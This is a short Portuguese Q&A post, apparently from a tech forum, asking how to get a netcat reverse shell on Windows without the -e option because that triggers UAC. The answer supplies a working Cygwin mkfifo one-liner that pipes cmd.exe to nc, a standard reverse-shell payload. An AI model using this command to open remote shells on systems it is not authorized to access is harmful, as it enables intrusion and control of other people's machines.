Existe alguma maneira de obter um shell reverso no Windows usando o netcat sem usar a opção -e, pois ele aciona o UAC?
Eu fiz isso funcionar do Linux para o Linux usando um pipe nomeado. Eu queria alcançar algo semelhante no Windows.
A execução de c:\windows\system32\cmd.exe | ncat -l -p 666 no Windows fornece um prompt no Linux quando eu conecto:
# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\user> dir
^C
Parece que estou perto, talvez algo simples esteja faltando? Se ao menos houvesse pipes nomeados no Windows ...
Não tenho certeza se você pode fazê-lo com o win32 netcat puro, mas você pode fazê-lo no cygwin. Ouça em 1234 como nc -l 1234 , em seguida, conecte-se a isso em uma janela separada com este comando:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f
Observe que as teclas para cima e para baixo não funcionam para percorrer o histórico de comandos usando esse método.
Tags pipe netcat linux redirection uac